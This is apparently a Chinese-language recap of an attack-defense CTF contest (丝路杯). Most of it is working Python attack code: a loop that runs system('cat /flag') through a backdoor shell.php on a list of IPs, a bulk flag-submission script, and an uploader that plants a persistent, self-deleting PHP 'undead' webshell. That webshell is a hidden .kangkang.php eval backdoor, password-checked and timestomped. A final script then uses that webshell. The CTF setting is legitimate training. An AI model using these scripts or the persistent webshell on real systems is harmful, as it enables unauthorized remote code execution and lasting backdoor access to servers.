丝路杯

这是一个对丝路杯的总结，主要是awd攻防。从这次比赛中找到不足。（之后有补充的话会继续补充）

这次的check很抽象，检测你有没有修改后门文件，修改了，直接异常，只能删除后门文件（无异常）。而且对通防没有限制，虽说文件里明确说明了，但是裁判和技术人员居然不知道规则，现场查看规则。靶机没有重置功能，但文件里说有

我们是第一个找到后门文件的，拿到了一血，但脚本没准备好，是现场手搓的,导致awd惨不忍睹。

下面是代码：

得到flag并写入文件的代码

import requests

ips = open("./ip.txt","r")
url = "/shell.php"

for ip in ips:
    urlip = ip.strip()+url
    data={
        "shell":"system('cat /flag')"
    }
    try:
        response = requests.post(url=urlip, data=data, timeout=3)
        if "flag" in response.text:
            print("Found flag:", response.text)
            with open("flag.txt", "a") as file:
                file.write(response.text + "\n")
    except requests.RequestException as e:
        print(f"Error requesting {urlip}: {e}")

ips.close()

批量提交flag的代码：

import requests

url = "http://democtf.yanwuting.cn/api/v1/awd/answer?evt=acefcc4d-a9cb-4d4a-a75d-7fb7fea5018e"
token = "1792049566158509911"

with open("flag.txt","r") as flags:

    for flag in flags:
        flag = flag.strip()
        # 构造请求数据
        data = {
            "flag": flag,
            "token": token
        }
        try:
            # 发送POST请求
            response = requests.post(url, data=data, timeout=3)
            # 打印提交结果
            print(f"提交flag: {flag}，响应状态码: {response.status_code}，响应内容: {response.text}")
        except requests.exceptions.RequestException as e:
            print(f"提交flag: {flag} 时发生错误: {e}")

上传不死马代码：

import requests
import base64

ips = open("./ip.txt", "r")
url_suffix = "/shell.php"

# 要上传的文件内容
file_content = '''<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.kangkang.php';
    $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST["cmd"]);} ?>';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .kangkang.php');
        usleep(1);
    }
?>'''

# 将内容进行base64编码，避免特殊字符问题
encoded_content = base64.b64encode(file_content.encode()).decode()

for ip in ips:
    ip = ip.strip()
    if not ip:
        continue

    urlip = ip + url_suffix
    print("Testing:", urlip)

    # 使用base64解码并写入文件
    data = {
        "shell": f"echo '{encoded_content}' | base64 -d > /var/www/html/.kangkang.php"
    }

    try:
        response = requests.post(url=urlip, data=data, timeout=5)
        print("Upload response:", response.text)

        # 验证文件是否上传成功
        verify_data = {
            "shell": "ls -la /var/www/html/.kangkang.php && cat /var/www/html/.kangkang.php | head -5"
        }
        verify_response = requests.post(url=urlip, data=verify_data, timeout=5)
        if ".kangkang.php" in verify_response.text:
            print("File uploaded successfully!")

            url2 = ip+".kangkang.php"
            response2 = requests.get(url=url2, timeout=5)
            print(response2.status_code)

    except requests.RequestException as e:
        print(f"Error requesting {urlip}: {e}")

ips.close()

利用不死马

import requests

with open("ip.txt","r") as ips:

    for ip in ips:
        url=ip.strip()+"/.kangkang.php?pass=test"
        data={
            "cmd":"system('cat /flag')"
        }
        try:
            response = requests.post(url=url, data=data, timeout=3)

            if "flag" in response.text:
                print(f"Found flag at {ip}: {response.text}")
                with open("flag.txt", "a") as file:
                    file.write(response.text + "\n")
            else:
                print(f"No flag found at {ip}, response: {response.text[:100]}...")  # 只显示前100个字符

        except requests.RequestException as e:
            print(f"Error requesting {url}: {e}")